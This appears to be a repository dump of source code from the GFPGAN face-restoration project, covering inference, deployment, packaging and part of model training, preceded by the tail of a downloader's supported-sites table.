<https://hentai-foundry.com> | | **Hitomi.la** | <https://hitomi.la> | | **Imgur** | <https://imgur.com> | | **Instagram** | <https://instagram.com> | | **Iwara** | <https://iwara.tv><br><https://ecchi.iwara.tv> | | **Jmana** | <https://jmana.net> | | **カクヨム** | <https://kakuyomu.jp> | | **Luscious** | <https://luscious.net> | | **Mastodon** | <https://mastodon.social> | | **Misskey** | <https://misskey.io> | | **MyReadingManga** | <https://myreadingmanga.info> | | **Naver Blog** | <https://blog.naver.com> | | **Naver Cafe** | <https://cafe.naver.com> | | **Naver Post** | <https://post.naver.com> | | **Naver Webtoon** | <https://comic.naver.com> | | **Naver TV** | <https://tv.naver.com> | | **nhentai** | <https://nhentai.net> | | **nhentai.com** | <https://nhentai.com> | | **Niconico** | <http://nicovideo.jp> | | **ニジエ** | <https://nijie.info> | | **Nozomi.la** | <https://nozomi.la> | | **Pawoo** | <https://pawoo.net> | | **Pinterest** | <https://pinterest.com> | | **Pixiv** | <https://pixiv.net> | | **pixivコミック** | <https://comic.pixiv.net> | | **Pornhub** | <https://pornhub.com><br><https://pornhubpremium.com> | | **Rule34.xxx** | <https://rule34.xxx> | | **Sankaku Complex** | 
<https://www.sankakucomplex.com><br><https://chan.sankakucomplex.com><br><https://idol.sankakucomplex.com> | | **Soundcloud** | <https://soundcloud.com> | | **小説家になろう** | <https://syosetu.com> | | **TikTok** | <https://tiktok.com><br><https://douyin.com>| | **TOKYO Motion** | <https://tokyomotion.net> | | **Tumblr** | <https://tumblr.com> | | **Twitch** | <https://twitch.tv> | | **Twitter** | <https://twitter.com> | | **Vimeo** | <https://vimeo.com> | | **Wayback Machine** | <https://archive.org> | | **Weibo** | <https://weibo.com> | | **WikiArt** | <https://www.wikiart.org> | | **xHamster** | <https://xhamster.com> | | **XNXX** | <https://xnxx.com> | | **XVideos** | <https://xvideos.com> | | **Yande.re** | <https://yande.re> | | **Youku** | <https://youku.com> | | **YouTube** | <https://youtube.com> | | **and more...** | [Supported sites by yt-dlp](https://github.com/yt-dlp/yt-dlp/blob/master/supportedsites.md) |
GFPGAN
7552a7791caad982045a7bbe5634bbf1cd5c8679
File: cog_predict.py # flake8: noqa # This file is used for deploying replicate models # running: cog predict -i img=@inputs/whole_imgs/10045.png -i version='v1.4' -i scale=2 # push: cog push r8.im/tencentarc/gfpgan # push (backup): cog push r8.im/xinntao/gfpgan import os os.system('python setup.py develop') os.system('pip install realesrgan') import cv2 import shutil import tempfile import torch from basicsr.archs.srvgg_arch import SRVGGNetCompact from gfpgan import GFPGANer try: from cog import BasePredictor, Input, Path from realesrgan.utils import RealESRGANer except Exception: print('please install cog and realesrgan package') class Predictor(BasePredictor): def setup(self): os.makedirs('output', exist_ok=True) # download weights if not os.path.exists('gfpgan/weights/realesr-general-x4v3.pth'): os.system( 'wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-x4v3.pth -P ./gfpgan/weights' ) if not os.path.exists('gfpgan/weights/GFPGANv1.2.pth'): os.system( 'wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.2.pth -P ./gfpgan/weights') if not os.path.exists('gfpgan/weights/GFPGANv1.3.pth'): os.system( 'wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth -P ./gfpgan/weights') if not os.path.exists('gfpgan/weights/GFPGANv1.4.pth'): os.system( 'wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.4.pth -P ./gfpgan/weights') if not os.path.exists('gfpgan/weights/RestoreFormer.pth'): os.system( 'wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.4/RestoreFormer.pth -P ./gfpgan/weights' ) # background enhancer with RealESRGAN model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=32, upscale=4, act_type='prelu') model_path = 'gfpgan/weights/realesr-general-x4v3.pth' half = True if torch.cuda.is_available() else False self.upsampler = RealESRGANer( scale=4, model_path=model_path, model=model, tile=0, tile_pad=10, pre_pad=0, half=half) # Use GFPGAN for face enhancement self.face_enhancer = GFPGANer( model_path='gfpgan/weights/GFPGANv1.4.pth', upscale=2, arch='clean', channel_multiplier=2, bg_upsampler=self.upsampler) self.current_version = 'v1.4' def predict( self, img: Path = Input(description='Input'), version: str = Input( description='GFPGAN version. v1.3: better quality. 
v1.4: more details and better identity.', choices=['v1.2', 'v1.3', 'v1.4', 'RestoreFormer'], default='v1.4'), scale: float = Input(description='Rescaling factor', default=2), ) -> Path: weight = 0.5 print(img, version, scale, weight) try: extension = os.path.splitext(os.path.basename(str(img)))[1] img = cv2.imread(str(img), cv2.IMREAD_UNCHANGED) if len(img.shape) == 3 and img.shape[2] == 4: img_mode = 'RGBA' elif len(img.shape) == 2: img_mode = None img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) else: img_mode = None h, w = img.shape[0:2] if h < 300: img = cv2.resize(img, (w * 2, h * 2), interpolation=cv2.INTER_LANCZOS4) if self.current_version != version: if version == 'v1.2': self.face_enhancer = GFPGANer( model_path='gfpgan/weights/GFPGANv1.2.pth', upscale=2, arch='clean', channel_multiplier=2, bg_upsampler=self.upsampler) self.current_version = 'v1.2' elif version == 'v1.3': self.face_enhancer = GFPGANer( model_path='gfpgan/weights/GFPGANv1.3.pth', upscale=2, arch='clean', channel_multiplier=2, bg_upsampler=self.upsampler) self.current_version = 'v1.3' elif version == 'v1.4': self.face_enhancer = GFPGANer( model_path='gfpgan/weights/GFPGANv1.4.pth', upscale=2, arch='clean', channel_multiplier=2, bg_upsampler=self.upsampler) self.current_version = 'v1.4' elif version == 'RestoreFormer': self.face_enhancer = GFPGANer( model_path='gfpgan/weights/RestoreFormer.pth', upscale=2, arch='RestoreFormer', channel_multiplier=2, bg_upsampler=self.upsampler) try: _, _, output = self.face_enhancer.enhance( img, has_aligned=False, only_center_face=False, paste_back=True, weight=weight) except RuntimeError as error: print('Error', error) try: if scale != 2: interpolation = cv2.INTER_AREA if scale < 2 else cv2.INTER_LANCZOS4 h, w = img.shape[0:2] output = cv2.resize(output, (int(w * scale / 2), int(h * scale / 2)), interpolation=interpolation) except Exception as error: print('wrong scale input.', error) if img_mode == 'RGBA': # RGBA images should be saved in png format extension = 'png' # save_path = f'output/out.{extension}' # cv2.imwrite(save_path, output) out_path = Path(tempfile.mkdtemp()) / f'out.{extension}' cv2.imwrite(str(out_path), output) except Exception as error: print('global exception: ', error) finally: clean_folder('output') return out_path def clean_folder(folder): for filename in os.listdir(folder): file_path = os.path.join(folder, filename) try: if os.path.isfile(file_path) or os.path.islink(file_path): os.unlink(file_path) elif os.path.isdir(file_path): shutil.rmtree(file_path) except Exception as e: print(f'Failed to delete {file_path}. 
Reason: {e}') File: setup.py #!/usr/bin/env python from setuptools import find_packages, setup import os import subprocess import time version_file = 'gfpgan/version.py' def readme(): with open('README.md', encoding='utf-8') as f: content = f.read() return content def get_git_hash(): def _minimal_ext_cmd(cmd): # construct minimal environment env = {} for k in ['SYSTEMROOT', 'PATH', 'HOME']: v = os.environ.get(k) if v is not None: env[k] = v # LANGUAGE is used on win32 env['LANGUAGE'] = 'C' env['LANG'] = 'C' env['LC_ALL'] = 'C' out = subprocess.Popen(cmd, stdout=subprocess.PIPE, env=env).communicate()[0] return out try: out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD']) sha = out.strip().decode('ascii') except OSError: sha = 'unknown' return sha def get_hash(): if os.path.exists('.git'): sha = get_git_hash()[:7] else: sha = 'unknown' return sha def write_version_py(): content = """# GENERATED VERSION FILE # TIME: {} __version__ = '{}' __gitsha__ = '{}' version_info = ({}) """ sha = get_hash() with open('VERSION', 'r') as f: SHORT_VERSION = f.read().strip() VERSION_INFO = ', '.join([x if x.isdigit() else f'"{x}"' for x in SHORT_VERSION.split('.')]) version_file_str = content.format(time.asctime(), SHORT_VERSION, sha, VERSION_INFO) with open(version_file, 'w') as f: f.write(version_file_str) def get_version(): with open(version_file, 'r') as f: exec(compile(f.read(), version_file, 'exec')) return locals()['__version__'] def get_requirements(filename='requirements.txt'): here = os.path.dirname(os.path.realpath(__file__)) with open(os.path.join(here, filename), 'r') as f: requires = [line.replace('\n', '') for line in f.readlines()] return requires if __name__ == '__main__': write_version_py() setup( name='gfpgan', version=get_version(), description='GFPGAN aims at developing Practical Algorithms for Real-world Face Restoration', long_description=readme(), long_description_content_type='text/markdown', author='Xintao Wang', author_email='[email protected]', keywords='computer vision, pytorch, image restoration, super-resolution, face restoration, gan, gfpgan', url='https://github.com/TencentARC/GFPGAN', include_package_data=True, packages=find_packages(exclude=('options', 'datasets', 'experiments', 'results', 'tb_logger', 'wandb')), classifiers=[ 'Development Status :: 4 - Beta', 'License :: OSI Approved :: Apache Software License', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', ], license='Apache License Version 2.0', setup_requires=['cython', 'numpy'], install_requires=get_requirements(), zip_safe=False) File: inference_gfpgan.py import argparse import cv2 import glob import numpy as np import os import torch from basicsr.utils import imwrite from gfpgan import GFPGANer def main(): """Inference demo for GFPGAN (for users). """ parser = argparse.ArgumentParser() parser.add_argument( '-i', '--input', type=str, default='inputs/whole_imgs', help='Input image or folder. Default: inputs/whole_imgs') parser.add_argument('-o', '--output', type=str, default='results', help='Output folder. Default: results') # we use version to select models, which is more user-friendly parser.add_argument( '-v', '--version', type=str, default='1.3', help='GFPGAN model version. Option: 1 | 1.2 | 1.3. Default: 1.3') parser.add_argument( '-s', '--upscale', type=int, default=2, help='The final upsampling scale of the image. 
Default: 2') parser.add_argument( '--bg_upsampler', type=str, default='realesrgan', help='background upsampler. Default: realesrgan') parser.add_argument( '--bg_tile', type=int, default=400, help='Tile size for background sampler, 0 for no tile during testing. Default: 400') parser.add_argument('--suffix', type=str, default=None, help='Suffix of the restored faces') parser.add_argument('--only_center_face', action='store_true', help='Only restore the center face') parser.add_argument('--aligned', action='store_true', help='Input are aligned faces') parser.add_argument( '--ext', type=str, default='auto', help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs. Default: auto') parser.add_argument('-w', '--weight', type=float, default=0.5, help='Adjustable weights.') args = parser.parse_args() args = parser.parse_args() # ------------------------ input & output ------------------------ if args.input.endswith('/'): args.input = args.input[:-1] if os.path.isfile(args.input): img_list = [args.input] else: img_list = sorted(glob.glob(os.path.join(args.input, '*'))) os.makedirs(args.output, exist_ok=True) # ------------------------ set up background upsampler ------------------------ if args.bg_upsampler == 'realesrgan': if not torch.cuda.is_available(): # CPU import warnings warnings.warn('The unoptimized RealESRGAN is slow on CPU. We do not use it. ' 'If you really want to use it, please modify the corresponding codes.') bg_upsampler = None else: from basicsr.archs.rrdbnet_arch import RRDBNet from realesrgan import RealESRGANer model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2) bg_upsampler = RealESRGANer( scale=2, model_path='https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.1/RealESRGAN_x2plus.pth', model=model, tile=args.bg_tile, tile_pad=10, pre_pad=0, half=True) # need to set False in CPU mode else: bg_upsampler = None # ------------------------ set up GFPGAN restorer ------------------------ if args.version == '1': arch = 'original' channel_multiplier = 1 model_name = 'GFPGANv1' url = 'https://github.com/TencentARC/GFPGAN/releases/download/v0.1.0/GFPGANv1.pth' elif args.version == '1.2': arch = 'clean' channel_multiplier = 2 model_name = 'GFPGANCleanv1-NoCE-C2' url = 'https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth' elif args.version == '1.3': arch = 'clean' channel_multiplier = 2 model_name = 'GFPGANv1.3' url = 'https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth' elif args.version == '1.4': arch = 'clean' channel_multiplier = 2 model_name = 'GFPGANv1.4' url = 'https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.4.pth' elif args.version == 'RestoreFormer': arch = 'RestoreFormer' channel_multiplier = 2 model_name = 'RestoreFormer' url = 'https://github.com/TencentARC/GFPGAN/releases/download/v1.3.4/RestoreFormer.pth' else: raise ValueError(f'Wrong model version {args.version}.') # determine model paths model_path = os.path.join('experiments/pretrained_models', model_name + '.pth') if not os.path.isfile(model_path): model_path = os.path.join('gfpgan/weights', model_name + '.pth') if not os.path.isfile(model_path): # download pre-trained models from url model_path = url restorer = GFPGANer( model_path=model_path, upscale=args.upscale, arch=arch, channel_multiplier=channel_multiplier, bg_upsampler=bg_upsampler) # ------------------------ restore ------------------------ for img_path in img_list: # read image 
img_name = os.path.basename(img_path) print(f'Processing {img_name} ...') basename, ext = os.path.splitext(img_name) input_img = cv2.imread(img_path, cv2.IMREAD_COLOR) # restore faces and background if necessary cropped_faces, restored_faces, restored_img = restorer.enhance( input_img, has_aligned=args.aligned, only_center_face=args.only_center_face, paste_back=True, weight=args.weight) # save faces for idx, (cropped_face, restored_face) in enumerate(zip(cropped_faces, restored_faces)): # save cropped face save_crop_path = os.path.join(args.output, 'cropped_faces', f'{basename}_{idx:02d}.png') imwrite(cropped_face, save_crop_path) # save restored face if args.suffix is not None: save_face_name = f'{basename}_{idx:02d}_{args.suffix}.png' else: save_face_name = f'{basename}_{idx:02d}.png' save_restore_path = os.path.join(args.output, 'restored_faces', save_face_name) imwrite(restored_face, save_restore_path) # save comparison image cmp_img = np.concatenate((cropped_face, restored_face), axis=1) imwrite(cmp_img, os.path.join(args.output, 'cmp', f'{basename}_{idx:02d}.png')) # save restored img if restored_img is not None: if args.ext == 'auto': extension = ext[1:] else: extension = args.ext if args.suffix is not None: save_restore_path = os.path.join(args.output, 'restored_imgs', f'{basename}_{args.suffix}.{extension}') else: save_restore_path = os.path.join(args.output, 'restored_imgs', f'{basename}.{extension}') imwrite(restored_img, save_restore_path) print(f'Results are in the [{args.output}] folder.') if __name__ == '__main__': main() File: gfpgan/__init__.py # flake8: noqa from .archs import * from .data import * from .models import * from .utils import * # from .version import * File: gfpgan/utils.py import cv2 import os import torch from basicsr.utils import img2tensor, tensor2img from basicsr.utils.download_util import load_file_from_url from facexlib.utils.face_restoration_helper import FaceRestoreHelper from torchvision.transforms.functional import normalize from gfpgan.archs.gfpgan_bilinear_arch import GFPGANBilinear from gfpgan.archs.gfpganv1_arch import GFPGANv1 from gfpgan.archs.gfpganv1_clean_arch import GFPGANv1Clean ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) class GFPGANer(): """Helper for restoration with GFPGAN. It will detect and crop faces, and then resize the faces to 512x512. GFPGAN is used to restored the resized faces. The background is upsampled with the bg_upsampler. Finally, the faces will be pasted back to the upsample background image. Args: model_path (str): The path to the GFPGAN model. It can be urls (will first download it automatically). upscale (float): The upscale of the final output. Default: 2. arch (str): The GFPGAN architecture. Option: clean | original. Default: clean. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. bg_upsampler (nn.Module): The upsampler for the background. Default: None. 
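    Example:
        Illustrative call pattern only (it mirrors the usage in inference_gfpgan.py above; the
        model path and the BGR image `input_img` loaded with cv2.imread are placeholders):

        >>> restorer = GFPGANer(
        ...     model_path='experiments/pretrained_models/GFPGANv1.3.pth',
        ...     upscale=2, arch='clean', channel_multiplier=2, bg_upsampler=None)
        >>> cropped_faces, restored_faces, restored_img = restorer.enhance(
        ...     input_img, has_aligned=False, only_center_face=False, paste_back=True, weight=0.5)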
""" def __init__(self, model_path, upscale=2, arch='clean', channel_multiplier=2, bg_upsampler=None, device=None): self.upscale = upscale self.bg_upsampler = bg_upsampler # initialize model self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device is None else device # initialize the GFP-GAN if arch == 'clean': self.gfpgan = GFPGANv1Clean( out_size=512, num_style_feat=512, channel_multiplier=channel_multiplier, decoder_load_path=None, fix_decoder=False, num_mlp=8, input_is_latent=True, different_w=True, narrow=1, sft_half=True) elif arch == 'bilinear': self.gfpgan = GFPGANBilinear( out_size=512, num_style_feat=512, channel_multiplier=channel_multiplier, decoder_load_path=None, fix_decoder=False, num_mlp=8, input_is_latent=True, different_w=True, narrow=1, sft_half=True) elif arch == 'original': self.gfpgan = GFPGANv1( out_size=512, num_style_feat=512, channel_multiplier=channel_multiplier, decoder_load_path=None, fix_decoder=True, num_mlp=8, input_is_latent=True, different_w=True, narrow=1, sft_half=True) elif arch == 'RestoreFormer': from gfpgan.archs.restoreformer_arch import RestoreFormer self.gfpgan = RestoreFormer() # initialize face helper self.face_helper = FaceRestoreHelper( upscale, face_size=512, crop_ratio=(1, 1), det_model='retinaface_resnet50', save_ext='png', use_parse=True, device=self.device, model_rootpath='gfpgan/weights') if model_path.startswith('https://'): model_path = load_file_from_url( url=model_path, model_dir=os.path.join(ROOT_DIR, 'gfpgan/weights'), progress=True, file_name=None) loadnet = torch.load(model_path) if 'params_ema' in loadnet: keyname = 'params_ema' else: keyname = 'params' self.gfpgan.load_state_dict(loadnet[keyname], strict=True) self.gfpgan.eval() self.gfpgan = self.gfpgan.to(self.device) @torch.no_grad() def enhance(self, img, has_aligned=False, only_center_face=False, paste_back=True, weight=0.5): self.face_helper.clean_all() if has_aligned: # the inputs are already aligned img = cv2.resize(img, (512, 512)) self.face_helper.cropped_faces = [img] else: self.face_helper.read_image(img) # get face landmarks for each face self.face_helper.get_face_landmarks_5(only_center_face=only_center_face, eye_dist_threshold=5) # eye_dist_threshold=5: skip faces whose eye distance is smaller than 5 pixels # TODO: even with eye_dist_threshold, it will still introduce wrong detections and restorations. 
            # align and warp each face
            self.face_helper.align_warp_face()

        # face restoration
        for cropped_face in self.face_helper.cropped_faces:
            # prepare data
            cropped_face_t = img2tensor(cropped_face / 255., bgr2rgb=True, float32=True)
            normalize(cropped_face_t, (0.5, 0.5, 0.5), (0.5, 0.5, 0.5), inplace=True)
            cropped_face_t = cropped_face_t.unsqueeze(0).to(self.device)

            try:
                output = self.gfpgan(cropped_face_t, return_rgb=False, weight=weight)[0]
                # convert to image
                restored_face = tensor2img(output.squeeze(0), rgb2bgr=True, min_max=(-1, 1))
            except RuntimeError as error:
                print(f'\tFailed inference for GFPGAN: {error}.')
                restored_face = cropped_face

            restored_face = restored_face.astype('uint8')
            self.face_helper.add_restored_face(restored_face)

        if not has_aligned and paste_back:
            # upsample the background
            if self.bg_upsampler is not None:
                # Now only support RealESRGAN for upsampling background
                bg_img = self.bg_upsampler.enhance(img, outscale=self.upscale)[0]
            else:
                bg_img = None

            self.face_helper.get_inverse_affine(None)
            # paste each restored face to the input image
            restored_img = self.face_helper.paste_faces_to_input_image(upsample_img=bg_img)
            return self.face_helper.cropped_faces, self.face_helper.restored_faces, restored_img
        else:
            return self.face_helper.cropped_faces, self.face_helper.restored_faces, None


File: gfpgan/train.py


# flake8: noqa
import os.path as osp
from basicsr.train import train_pipeline

import gfpgan.archs
import gfpgan.data
import gfpgan.models

if __name__ == '__main__':
    root_path = osp.abspath(osp.join(__file__, osp.pardir, osp.pardir))
    train_pipeline(root_path)


File: gfpgan/models/gfpgan_model.py


import math
import os.path as osp
import torch
from basicsr.archs import build_network
from basicsr.losses import build_loss
from basicsr.losses.gan_loss import r1_penalty
from basicsr.metrics import calculate_metric
from basicsr.models.base_model import BaseModel
from basicsr.utils import get_root_logger, imwrite, tensor2img
from basicsr.utils.registry import MODEL_REGISTRY
from collections import OrderedDict
from torch.nn import functional as F
from torchvision.ops import roi_align
from tqdm import tqdm


@MODEL_REGISTRY.register()
class GFPGANModel(BaseModel):
    """The GFPGAN model for Towards real-world blind face restoration with generative facial prior"""

    def __init__(self, opt):
        super(GFPGANModel, self).__init__(opt)
        self.idx = 0  # it is used for saving data for check

        # define network
        self.net_g = build_network(opt['network_g'])
        self.net_g = self.model_to_device(self.net_g)
        self.print_network(self.net_g)

        # load pretrained model
        load_path = self.opt['path'].get('pretrain_network_g', None)
        if load_path is not None:
            param_key = self.opt['path'].get('param_key_g', 'params')
            self.load_network(self.net_g, load_path, self.opt['path'].get('strict_load_g', True), param_key)

        self.log_size = int(math.log(self.opt['network_g']['out_size'], 2))

        if self.is_train:
            self.init_training_settings()

    def init_training_settings(self):
        train_opt = self.opt['train']

        # ----------- define net_d ----------- #
        self.net_d = build_network(self.opt['network_d'])
        self.net_d = self.model_to_device(self.net_d)
        self.print_network(self.net_d)
        # load pretrained model
        load_path = self.opt['path'].get('pretrain_network_d', None)
        if load_path is not None:
            self.load_network(self.net_d, load_path, self.opt['path'].get('strict_load_d', True))

        # ----------- define net_g with Exponential Moving Average (EMA) ----------- #
        # net_g_ema only used for testing on one GPU and saving.
There is no need to wrap with DistributedDataParallel self.net_g_ema = build_network(self.opt['network_g']).to(self.device) # load pretrained model load_path = self.opt['path'].get('pretrain_network_g', None) if load_path is not None: self.load_network(self.net_g_ema, load_path, self.opt['path'].get('strict_load_g', True), 'params_ema') else: self.model_ema(0) # copy net_g weight self.net_g.train() self.net_d.train() self.net_g_ema.eval() # ----------- facial component networks ----------- # if ('network_d_left_eye' in self.opt and 'network_d_right_eye' in self.opt and 'network_d_mouth' in self.opt): self.use_facial_disc = True else: self.use_facial_disc = False if self.use_facial_disc: # left eye self.net_d_left_eye = build_network(self.opt['network_d_left_eye']) self.net_d_left_eye = self.model_to_device(self.net_d_left_eye) self.print_network(self.net_d_left_eye) load_path = self.opt['path'].get('pretrain_network_d_left_eye') if load_path is not None: self.load_network(self.net_d_left_eye, load_path, True, 'params') # right eye self.net_d_right_eye = build_network(self.opt['network_d_right_eye']) self.net_d_right_eye = self.model_to_device(self.net_d_right_eye) self.print_network(self.net_d_right_eye) load_path = self.opt['path'].get('pretrain_network_d_right_eye') if load_path is not None: self.load_network(self.net_d_right_eye, load_path, True, 'params') # mouth self.net_d_mouth = build_network(self.opt['network_d_mouth']) self.net_d_mouth = self.model_to_device(self.net_d_mouth) self.print_network(self.net_d_mouth) load_path = self.opt['path'].get('pretrain_network_d_mouth') if load_path is not None: self.load_network(self.net_d_mouth, load_path, True, 'params') self.net_d_left_eye.train() self.net_d_right_eye.train() self.net_d_mouth.train() # ----------- define facial component gan loss ----------- # self.cri_component = build_loss(train_opt['gan_component_opt']).to(self.device) # ----------- define losses ----------- # # pixel loss if train_opt.get('pixel_opt'): self.cri_pix = build_loss(train_opt['pixel_opt']).to(self.device) else: self.cri_pix = None # perceptual loss if train_opt.get('perceptual_opt'): self.cri_perceptual = build_loss(train_opt['perceptual_opt']).to(self.device) else: self.cri_perceptual = None # L1 loss is used in pyramid loss, component style loss and identity loss self.cri_l1 = build_loss(train_opt['L1_opt']).to(self.device) # gan loss (wgan) self.cri_gan = build_loss(train_opt['gan_opt']).to(self.device) # ----------- define identity loss ----------- # if 'network_identity' in self.opt: self.use_identity = True else: self.use_identity = False if self.use_identity: # define identity network self.network_identity = build_network(self.opt['network_identity']) self.network_identity = self.model_to_device(self.network_identity) self.print_network(self.network_identity) load_path = self.opt['path'].get('pretrain_network_identity') if load_path is not None: self.load_network(self.network_identity, load_path, True, None) self.network_identity.eval() for param in self.network_identity.parameters(): param.requires_grad = False # regularization weights self.r1_reg_weight = train_opt['r1_reg_weight'] # for discriminator self.net_d_iters = train_opt.get('net_d_iters', 1) self.net_d_init_iters = train_opt.get('net_d_init_iters', 0) self.net_d_reg_every = train_opt['net_d_reg_every'] # set up optimizers and schedulers self.setup_optimizers() self.setup_schedulers() def setup_optimizers(self): train_opt = self.opt['train'] # ----------- optimizer g ----------- # 
net_g_reg_ratio = 1 normal_params = [] for _, param in self.net_g.named_parameters(): normal_params.append(param) optim_params_g = [{ # add normal params first 'params': normal_params, 'lr': train_opt['optim_g']['lr'] }] optim_type = train_opt['optim_g'].pop('type') lr = train_opt['optim_g']['lr'] * net_g_reg_ratio betas = (0**net_g_reg_ratio, 0.99**net_g_reg_ratio) self.optimizer_g = self.get_optimizer(optim_type, optim_params_g, lr, betas=betas) self.optimizers.append(self.optimizer_g) # ----------- optimizer d ----------- # net_d_reg_ratio = self.net_d_reg_every / (self.net_d_reg_every + 1) normal_params = [] for _, param in self.net_d.named_parameters(): normal_params.append(param) optim_params_d = [{ # add normal params first 'params': normal_params, 'lr': train_opt['optim_d']['lr'] }] optim_type = train_opt['optim_d'].pop('type') lr = train_opt['optim_d']['lr'] * net_d_reg_ratio betas = (0**net_d_reg_ratio, 0.99**net_d_reg_ratio) self.optimizer_d = self.get_optimizer(optim_type, optim_params_d, lr, betas=betas) self.optimizers.append(self.optimizer_d) # ----------- optimizers for facial component networks ----------- # if self.use_facial_disc: # setup optimizers for facial component discriminators optim_type = train_opt['optim_component'].pop('type') lr = train_opt['optim_component']['lr'] # left eye self.optimizer_d_left_eye = self.get_optimizer( optim_type, self.net_d_left_eye.parameters(), lr, betas=(0.9, 0.99)) self.optimizers.append(self.optimizer_d_left_eye) # right eye self.optimizer_d_right_eye = self.get_optimizer( optim_type, self.net_d_right_eye.parameters(), lr, betas=(0.9, 0.99)) self.optimizers.append(self.optimizer_d_right_eye) # mouth self.optimizer_d_mouth = self.get_optimizer( optim_type, self.net_d_mouth.parameters(), lr, betas=(0.9, 0.99)) self.optimizers.append(self.optimizer_d_mouth) def feed_data(self, data): self.lq = data['lq'].to(self.device) if 'gt' in data: self.gt = data['gt'].to(self.device) if 'loc_left_eye' in data: # get facial component locations, shape (batch, 4) self.loc_left_eyes = data['loc_left_eye'] self.loc_right_eyes = data['loc_right_eye'] self.loc_mouths = data['loc_mouth'] # uncomment to check data # import torchvision # if self.opt['rank'] == 0: # import os # os.makedirs('tmp/gt', exist_ok=True) # os.makedirs('tmp/lq', exist_ok=True) # print(self.idx) # torchvision.utils.save_image( # self.gt, f'tmp/gt/gt_{self.idx}.png', nrow=4, padding=2, normalize=True, range=(-1, 1)) # torchvision.utils.save_image( # self.lq, f'tmp/lq/lq{self.idx}.png', nrow=4, padding=2, normalize=True, range=(-1, 1)) # self.idx = self.idx + 1 def construct_img_pyramid(self): """Construct image pyramid for intermediate restoration loss""" pyramid_gt = [self.gt] down_img = self.gt for _ in range(0, self.log_size - 3): down_img = F.interpolate(down_img, scale_factor=0.5, mode='bilinear', align_corners=False) pyramid_gt.insert(0, down_img) return pyramid_gt def get_roi_regions(self, eye_out_size=80, mouth_out_size=120): face_ratio = int(self.opt['network_g']['out_size'] / 512) eye_out_size *= face_ratio mouth_out_size *= face_ratio rois_eyes = [] rois_mouths = [] for b in range(self.loc_left_eyes.size(0)): # loop for batch size # left eye and right eye img_inds = self.loc_left_eyes.new_full((2, 1), b) bbox = torch.stack([self.loc_left_eyes[b, :], self.loc_right_eyes[b, :]], dim=0) # shape: (2, 4) rois = torch.cat([img_inds, bbox], dim=-1) # shape: (2, 5) rois_eyes.append(rois) # mouse img_inds = self.loc_left_eyes.new_full((1, 1), b) rois = torch.cat([img_inds, 
self.loc_mouths[b:b + 1, :]], dim=-1) # shape: (1, 5) rois_mouths.append(rois) rois_eyes = torch.cat(rois_eyes, 0).to(self.device) rois_mouths = torch.cat(rois_mouths, 0).to(self.device) # real images all_eyes = roi_align(self.gt, boxes=rois_eyes, output_size=eye_out_size) * face_ratio self.left_eyes_gt = all_eyes[0::2, :, :, :] self.right_eyes_gt = all_eyes[1::2, :, :, :] self.mouths_gt = roi_align(self.gt, boxes=rois_mouths, output_size=mouth_out_size) * face_ratio # output all_eyes = roi_align(self.output, boxes=rois_eyes, output_size=eye_out_size) * face_ratio self.left_eyes = all_eyes[0::2, :, :, :] self.right_eyes = all_eyes[1::2, :, :, :] self.mouths = roi_align(self.output, boxes=rois_mouths, output_size=mouth_out_size) * face_ratio def _gram_mat(self, x): """Calculate Gram matrix. Args: x (torch.Tensor): Tensor with shape of (n, c, h, w). Returns: torch.Tensor: Gram matrix. """ n, c, h, w = x.size() features = x.view(n, c, w * h) features_t = features.transpose(1, 2) gram = features.bmm(features_t) / (c * h * w) return gram def gray_resize_for_identity(self, out, size=128): out_gray = (0.2989 * out[:, 0, :, :] + 0.5870 * out[:, 1, :, :] + 0.1140 * out[:, 2, :, :]) out_gray = out_gray.unsqueeze(1) out_gray = F.interpolate(out_gray, (size, size), mode='bilinear', align_corners=False) return out_gray def optimize_parameters(self, current_iter): # optimize net_g for p in self.net_d.parameters(): p.requires_grad = False self.optimizer_g.zero_grad() # do not update facial component net_d if self.use_facial_disc: for p in self.net_d_left_eye.parameters(): p.requires_grad = False for p in self.net_d_right_eye.parameters(): p.requires_grad = False for p in self.net_d_mouth.parameters(): p.requires_grad = False # image pyramid loss weight pyramid_loss_weight = self.opt['train'].get('pyramid_loss_weight', 0) if pyramid_loss_weight > 0 and current_iter > self.opt['train'].get('remove_pyramid_loss', float('inf')): pyramid_loss_weight = 1e-12 # very small weight to avoid unused param error if pyramid_loss_weight > 0: self.output, out_rgbs = self.net_g(self.lq, return_rgb=True) pyramid_gt = self.construct_img_pyramid() else: self.output, out_rgbs = self.net_g(self.lq, return_rgb=False) # get roi-align regions if self.use_facial_disc: self.get_roi_regions(eye_out_size=80, mouth_out_size=120) l_g_total = 0 loss_dict = OrderedDict() if (current_iter % self.net_d_iters == 0 and current_iter > self.net_d_init_iters): # pixel loss if self.cri_pix: l_g_pix = self.cri_pix(self.output, self.gt) l_g_total += l_g_pix loss_dict['l_g_pix'] = l_g_pix # image pyramid loss if pyramid_loss_weight > 0: for i in range(0, self.log_size - 2): l_pyramid = self.cri_l1(out_rgbs[i], pyramid_gt[i]) * pyramid_loss_weight l_g_total += l_pyramid loss_dict[f'l_p_{2**(i+3)}'] = l_pyramid # perceptual loss if self.cri_perceptual: l_g_percep, l_g_style = self.cri_perceptual(self.output, self.gt) if l_g_percep is not None: l_g_total += l_g_percep loss_dict['l_g_percep'] = l_g_percep if l_g_style is not None: l_g_total += l_g_style 